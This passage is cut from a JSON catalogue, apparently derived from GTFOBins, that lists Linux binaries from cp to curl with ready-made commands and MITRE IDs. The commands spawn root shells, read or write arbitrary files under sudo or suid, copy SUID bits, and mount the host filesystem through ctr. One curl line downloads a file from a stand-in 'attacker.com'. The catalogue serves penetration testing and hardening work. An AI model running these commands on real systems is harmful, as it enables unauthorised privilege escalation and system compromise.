installation","aliases":[]},{"id":"gtfo:cp:privilege-escalation:1:suid","toolId":"gtfo:cp","toolName":"cp","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"cp --attributes-only --preserve=all /path/to/input-file /path/to/output-file","description":"This can copy SUID permissions from any SUID binary (e.g., `/path/to/input-file`) to another.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpan:inherit:0:sudo","toolId":"gtfo:cpan","toolName":"cpan","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"cpan\n! ...","description":"Perl code can be executed with the `!` command.","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpan/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpan:inherit:0:unprivileged","toolId":"gtfo:cpan","toolName":"cpan","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"cpan\n! ...","description":"Perl code can be executed with the `!` command.","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cpan/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpio:file-read:0:sudo","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -o","description":"The content of the file is printed to standard output, between the `cpio` archive format header and footer.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpio/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpio:file-read:0:suid","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -o","description":"The content of the file is printed to standard output, between the `cpio` archive format header and footer.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cpio/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpio:file-read:0:unprivileged","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -o","description":"The content of the file is printed to standard output, between the `cpio` archive format header and footer.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cpio/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpio:file-read:1:sudo","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -R $UID -dp .\ncat path/to/input-file","description":"The whole directory structure is copied to `.`, hence this is also a file write.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpio/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpio:file-read:1:suid","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -R $UID -dp .\ncat path/to/input-file","description":"The whole directory structure is copied to `.`, hence this is also a file write.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cpio/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpio:file-read:1:unprivileged","toolId":"gtfo:cpio","toolName":"cpio","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"echo /path/to/input-file | cpio -dp .\ncat path/to/input-file","description":"The whole directory structure is copied to `.`, hence this is also a file write.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cpio/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpio:file-write:0:sudo","toolId":"gtfo:cpio","toolName":"cpio","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\necho /path/to/temp-file | cpio -R 0:0 -udp .","description":"The whole directory structure is copied to `.`, with the data written to `./path/to/temp-file`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpio/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpio:file-write:0:suid","toolId":"gtfo:cpio","toolName":"cpio","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\necho /path/to/temp-file | cpio -R 0:0 -udp .","description":"The whole directory structure is copied to `.`, with the data written to `./path/to/temp-file`.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cpio/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpio:file-write:0:unprivileged","toolId":"gtfo:cpio","toolName":"cpio","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\necho /path/to/temp-file | cpio -udp .","description":"The whole directory structure is copied to `.`, with the data written to `./path/to/temp-file`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cpio/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpio:shell:0:sudo","toolId":"gtfo:cpio","toolName":"cpio","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '/bin/sh </dev/tty >/dev/tty' >localhost\ncpio -o --rsh-command /bin/sh -F localhost:","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpio/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpulimit:shell:0:sudo","toolId":"gtfo:cpulimit","toolName":"cpulimit","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cpulimit -l 100 -f -- /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cpulimit/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpulimit:shell:0:suid","toolId":"gtfo:cpulimit","toolName":"cpulimit","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cpulimit -l 100 -f -- /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cpulimit/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cpulimit:shell:0:unprivileged","toolId":"gtfo:cpulimit","toolName":"cpulimit","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cpulimit -l 100 -f -- /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cpulimit/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:crash:command:0:sudo","toolId":"gtfo:crash","toolName":"crash","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"CRASHPAGER=/path/to/command crash -h","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/crash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:crash:command:0:unprivileged","toolId":"gtfo:crash","toolName":"crash","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"CRASHPAGER=/path/to/command crash -h","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/crash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:crash:inherit:0:sudo","toolId":"gtfo:crash","toolName":"crash","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"crash -h","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/crash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:crash:inherit:0:suid","toolId":"gtfo:crash","toolName":"crash","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"crash -h","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/crash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:crash:inherit:0:unprivileged","toolId":"gtfo:crash","toolName":"crash","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"crash -h","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/crash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:crontab:command:0:sudo","toolId":"gtfo:crontab","toolName":"crontab","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"crontab -e","description":"This spaws the default editor to edit the crontab file, commands can be scheduled to run using the [cron syntax](https://en.wikipedia.org/wiki/Cron).","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/crontab/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:crontab:command:0:unprivileged","toolId":"gtfo:crontab","toolName":"crontab","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"crontab -e","description":"This spaws the default editor to edit the crontab file, commands can be scheduled to run using the [cron syntax](https://en.wikipedia.org/wiki/Cron).","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/crontab/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:crontab:inherit:0:sudo","toolId":"gtfo:crontab","toolName":"crontab","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"crontab -e","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/crontab/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:crontab:inherit:0:unprivileged","toolId":"gtfo:crontab","toolName":"crontab","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:vi"],"command":"crontab -e","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/crontab/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csh:file-write:0:sudo","toolId":"gtfo:csh","toolName":"csh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"csh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csh:file-write:0:suid","toolId":"gtfo:csh","toolName":"csh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"csh -c 'echo DATA >/path/to/output-file' -b","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csh:file-write:0:unprivileged","toolId":"gtfo:csh","toolName":"csh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"csh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csh:shell:0:sudo","toolId":"gtfo:csh","toolName":"csh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"csh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csh:shell:0:suid","toolId":"gtfo:csh","toolName":"csh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"csh -b","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csh:shell:0:unprivileged","toolId":"gtfo:csh","toolName":"csh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"csh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csplit:file-read:0:sudo","toolId":"gtfo:csplit","toolName":"csplit","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"csplit /path/to/input-file 1\ncat xx01","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csplit/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csplit:file-read:0:suid","toolId":"gtfo:csplit","toolName":"csplit","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"csplit /path/to/input-file 1\ncat xx01","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csplit/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csplit:file-read:0:unprivileged","toolId":"gtfo:csplit","toolName":"csplit","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"csplit /path/to/input-file 1\ncat xx01","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csplit/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csplit:file-write:0:sudo","toolId":"gtfo:csplit","toolName":"csplit","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsplit -z -b '%doutput-file' /path/to/temp-file 1","description":"Writes the data to `xx0output-file` in the current working directory. If needed, a different prefix can be specified with `-f` (instead of `xx`).","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csplit/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csplit:file-write:0:suid","toolId":"gtfo:csplit","toolName":"csplit","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsplit -z -b '%doutput-file' /path/to/temp-file 1","description":"Writes the data to `xx0output-file` in the current working directory. If needed, a different prefix can be specified with `-f` (instead of `xx`).","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csplit/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csplit:file-write:0:unprivileged","toolId":"gtfo:csplit","toolName":"csplit","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsplit -z -b '%doutput-file' /path/to/temp-file 1","description":"Writes the data to `xx0output-file` in the current working directory. If needed, a different prefix can be specified with `-f` (instead of `xx`).","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csplit/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csvtool:file-read:0:sudo","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"csvtool trim t /path/to/input-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csvtool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csvtool:file-read:0:suid","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"csvtool trim t /path/to/input-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csvtool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csvtool:file-read:0:unprivileged","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"csvtool trim t /path/to/input-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csvtool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csvtool:file-write:0:sudo","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsvtool trim t /path/to/temp-file -o /path/to/output-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csvtool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csvtool:file-write:0:suid","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsvtool trim t /path/to/temp-file -o /path/to/output-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csvtool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csvtool:file-write:0:unprivileged","toolId":"gtfo:csvtool","toolName":"csvtool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ncsvtool trim t /path/to/temp-file -o /path/to/output-file","description":"The file is actually parsed and manipulated as CSV.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csvtool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csvtool:shell:0:sudo","toolId":"gtfo:csvtool","toolName":"csvtool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"csvtool call '/bin/sh;false' /etc/hosts","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/csvtool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csvtool:shell:0:suid","toolId":"gtfo:csvtool","toolName":"csvtool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"csvtool call '/bin/sh;false' /etc/hosts","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/csvtool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:csvtool:shell:0:unprivileged","toolId":"gtfo:csvtool","toolName":"csvtool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"csvtool call '/bin/sh;false' /etc/hosts","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/csvtool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ctr:shell:0:sudo","toolId":"gtfo:ctr","toolName":"ctr","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ctr run --rm --mount type=bind,src=/,dst=/,options=rbind -t docker.io/library/alpine:latest x","description":"An image must be already present, for example:\n\n```\nctr images pull docker.io/library/alpine:latest\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ctr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ctr:shell:0:suid","toolId":"gtfo:ctr","toolName":"ctr","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ctr run --rm --mount type=bind,src=/,dst=/,options=rbind -t docker.io/library/alpine:latest x","description":"An image must be already present, for example:\n\n```\nctr images pull docker.io/library/alpine:latest\n```","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ctr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cupsfilter:file-read:0:sudo","toolId":"gtfo:cupsfilter","toolName":"cupsfilter","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cupsfilter -i application/octet-stream -m application/octet-stream /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cupsfilter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cupsfilter:file-read:0:suid","toolId":"gtfo:cupsfilter","toolName":"cupsfilter","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cupsfilter -i application/octet-stream -m application/octet-stream /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cupsfilter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cupsfilter:file-read:0:unprivileged","toolId":"gtfo:cupsfilter","toolName":"cupsfilter","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cupsfilter -i application/octet-stream -m application/octet-stream /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cupsfilter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:curl:download:0:sudo","toolId":"gtfo:curl","toolName":"curl","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"curl http://attacker.com/path/to/input-file -o /path/to/output-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/curl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution 